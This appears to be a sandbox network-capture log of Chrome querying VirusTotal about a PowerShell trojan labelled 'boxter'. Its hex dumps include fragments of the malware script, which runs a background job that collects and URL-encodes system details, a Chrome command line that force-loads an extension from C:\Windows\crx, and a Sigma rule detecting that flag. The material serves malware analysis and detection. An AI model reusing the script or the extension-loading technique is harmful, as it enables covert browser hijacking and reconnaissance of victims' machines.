                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 6f 70 75 6c 61 72 5f 74 68 72 65 61 74 5f 63 6c 61 73 73 69 66 69 63 61 74 69 6f 6e 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 75 67 67 65 73 74 65 64 5f 74 68 72 65 61 74 5f 6c 61 62 65 6c 22 3a 20 22 74 72 6f 6a 61 6e 2e 62 6f 78 74 65 72 2f 70 6f 77 65 72 73 68 65 6c 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 6f 70 75 6c 61 72 5f 74 68 72 65 61 74 5f 6e 61 6d 65 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 22 62 6f 78 74 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "popular_threat_classification": { "suggested_threat_label": "trojan.boxter/powershell", "popular_threat_name": [ { "value": "boxter",
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC544INData Raw: 64 6f 74 6e 65 74 5f 63 61 6c 6c 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 55 74 69 6c 69 74 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6d 64 6c 65 74 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 6f 72 65 61 63 68 2d 6f 62 6a 65 63 74 22 2c 0a 20 20
                                                                                                                                                                                                                    Data Ascii: dotnet_calls": [ "System.Convert", "System.Net.WebUtility", "System.Text.Encoding" ], "cmdlets": [ "foreach-object",
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 22 73 74 61 72 74 2d 6a 6f 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 74 61 72 74 2d 70 72 6f 63 65 73 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 6e 69 71 75 65 5f 73 6f 75 72 63 65 73 22 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 50 6f 77 65 72 73 68 65 6c 6c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 61 6e 69 6e 67 66 75 6c 5f 6e 61 6d 65 22 3a 20 22 79 79 79 6b 4f 72 6c 42 69 56 4e 64 54 66 50 47 51 57 53 4f 2e 70 73 31 22 2c 0a 20 20
                                                                                                                                                                                                                    Data Ascii: "start-job", "start-process" ] }, "unique_sources": 2, "type_description": "Powershell", "meaningful_name": "yyykOrlBiVNdTfPGQWSO.ps1",
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 75 72 72 65 6e 74 44 69 72 65 63 74 6f 72 79 22 3a 20 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 67 65 6f 72 67 65 5c 5c 44 65 73 6b 74 6f 70 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4f 72 69 67 69 6e 61 6c 46 69 6c 65 4e 61 6d 65 22 3a 20 22 63 68 72 6f 6d 65 2e 65 78 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 50 72 6f 64 75 63 74 22 3a 20 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 44 65 73 63 72 69
                                                                                                                                                                                                                    Data Ascii: "CurrentDirectory": "C:\\Users\\george\\Desktop\\", "OriginalFileName": "chrome.exe", "Product": "Google Chrome", "Descri
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1280INData Raw: 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 6c 65 76 65 6c 22 3a 20 22 6d 65 64 69 75 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 69 64 22 3a 20 22 33 33 65 37 33 35 31 35 35 32 66 33 38 32 38 33 31 61 66 36 62 66 37 33 64 38 36 30 35 34 62 63 65 64 30 35 35 65 36 34 64 66 30 39 31 66 35 37 32 63 39 34 65 39 66 63 39 65 39 61 32 61 39 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 73 6f 75 72 63 65 22 3a 20 22 53 69 67 6d 61 20 49 6e 74 65 67 72 61 74 65 64 20 52 75 6c 65 20 53 65 74 20 28 47 69 74 48
                                                                                                                                                                                                                    Data Ascii: }, { "rule_level": "medium", "rule_id": "33e7351552f382831af6bf73d86054bced055e64df091f572c94e9fc9e9a2a97", "rule_source": "Sigma Integrated Rule Set (GitH
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 74 69 74 6c 65 22 3a 20 22 43 68 72 6f 6d 69 75 6d 20 42 72 6f 77 73 65 72 20 49 6e 73 74 61 6e 63 65 20 45 78 65 63 75 74 65 64 20 57 69 74 68 20 43 75 73 74 6f 6d 20 45 78 74 65 6e 73 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 44 65 74 65 63 74 73 20 61 20 43 68 72 6f 6d 69 75 6d 20 62 61 73 65 64 20 62 72 6f 77 73 65 72 20 70 72 6f 63 65 73 73 20 77 69 74 68 20 74 68 65 20 27 6c 6f 61 64 2d 65 78 74 65 6e 73 69 6f 6e 27 20 66 6c 61 67 20 74 6f 20 73 74 61 72 74 20 61 20 69 6e 73 74 61 6e 63 65 20 77 69 74 68 20 61 20 63 75 73 74 6f 6d 20 65 78 74 65 6e 73 69 6f 6e 22 2c 0a 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "rule_title": "Chromium Browser Instance Executed With Custom Extension", "rule_description": "Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension",
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 20 2d 2d 64 69 73 61 62 6c 65 2d 66 65 61 74 75 72 65 73 3d 4f 70 74 69 6d 69 7a 61 74 69 6f 6e 47 75 69 64 65 4d 6f 64 65 6c 44 6f 77 6e 6c 6f 61 64 69 6e 67 2c 4f 70 74 69 6d 69 7a 61 74 69 6f 6e 48 69 6e 74 73 46 65 74 63 68 69 6e 67 2c 4f 70 74 69 6d 69 7a 61 74 69 6f 6e 54 61 72 67 65 74 50 72 65 64 69 63 74 69 6f 6e 2c 4f 70 74 69 6d 69 7a 61 74 69 6f 6e 48 69 6e 74 73 20 2d 2d 73 74 61 72 74 2d 6d 61 78 69 6d 69 7a 65 64 20 2d 2d 6c 6f 61 64 2d 65 78 74 65 6e 73 69 6f 6e 3d 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 63 72 78 20 2d 2d 73 69 6e 67 6c 65 2d 61 72 67 75 6d 65 6e 74 20 68 74 74 70 73 3a 2f 2f 61 73 61 6e 61 2e 63 6f 6d 2f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints --start-maximized --load-extension=C:\\Windows\\crx --single-argument https://asana.com/", "
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 63 72 69 70 74 42 6c 6f 63 6b 54 65 78 74 22 3a 20 22 24 41 67 20 3d 20 53 74 61 72 74 2d 4a 6f 62 20 2d 53 63 72 69 70 74 42 6c 6f 63 6b 20 7b 5c 72 5c 6e 20 20 20 20 24 46 41 68 52 51 41 6d 6e 68 46 41 6e 52 5a 6f 49 50 51 49 5a 6f 20 3d 20 28 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 4f 70 65 72 61 74 69 6e 67 53 79 73 74 65 6d 29 2e 43 61 70 74 69 6f 6e 5c 72 5c 6e 20 20 20 20 24 64 73 66 4c 52 20 3d 20 27 32 35 27 5c 72 5c 6e 20
                                                                                                                                                                                                                    Data Ascii: { "values": { "ScriptBlockText": "$Ag = Start-Job -ScriptBlock {\r\n $FAhRQAmnhFAnRZoIPQIZo = (Get-WmiObject -Class Win32_OperatingSystem).Caption\r\n $dsfLR = '25'\r\n
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 61 74 69 6e 67 53 79 73 74 65 6d 29 2e 43 61 70 74 69 6f 6e 5c 72 5c 6e 20 20 20 20 24 64 73 66 4c 52 20 3d 20 27 32 35 27 5c 72 5c 6e 20 20 20 20 24 54 69 73 7a 44 66 6e 66 69 77 6e 4b 58 70 44 6f 4c 4d 66 58 77 73 20 3d 20 27 33 39 62 32 34 35 33 36 2d 66 33 33 66 2d 34 38 65 65 2d 39 64 36 33 2d 34 37 32 33 65 34 32 65 31 36 66 39 27 5c 72 5c 6e 20 20 20 20 24 41 75 74 41 58 6c 53 4e 45 6c 74 20 3d 20 5b 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 55 74 69 6c 69 74 79 5d 3a 3a 55 72 6c 45 6e 63 6f 64 65 28 24 46 41 68 52 51 41 6d 6e 68 46 41 6e 52 5a 6f 49 50 51 49 5a 6f 29 5c 72 5c 6e 20 20 20 20 24 56 45 4d 62 71 73 73 64 45 6c 61 48 73 73 56 46 4d 73 6e 62 6e 7a 79 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 57 69 6e 33 32 5f 43 6f 6d 70 75 74
                                                                                                                                                                                                                    Data Ascii: atingSystem).Caption\r\n $dsfLR = '25'\r\n $TiszDfnfiwnKXpDoLMfXws = '39b24536-f33f-48ee-9d63-4723e42e16f9'\r\n $AutAXlSNElt = [System.Net.WebUtility]::UrlEncode($FAhRQAmnhFAnRZoIPQIZo)\r\n $VEMbqssdElaHssVFMsnbnzy = Get-WmiObject Win32_Comput


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    213192.168.2.164997174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC565OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urls HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: d6763638ba06c819f80c744186388cc5
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    214192.168.2.164997274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC964OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTYyNDUzODk2NTktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 11263f6d6f8ac29f99e98cd96ef95c30
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC229INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 70 65 5f 72 65 73 6f 75 72 63 65 5f 63 68 69 6c 64 72 65 6e 3f 6c 69 6d 69 74 3d 31 30 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children?limit=10" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    215192.168.2.164997374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC568OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1f8619bff67a50ba2be71b3c3d79951c
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    216192.168.2.164997574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC564OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 792a87fadbb33367a737e5860216f27f
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    217192.168.2.164997474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC965OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTMzOTIzOTA0NzEtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwOQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: d820d8028794243ec5aab2e0b4a43d81
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 55373
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
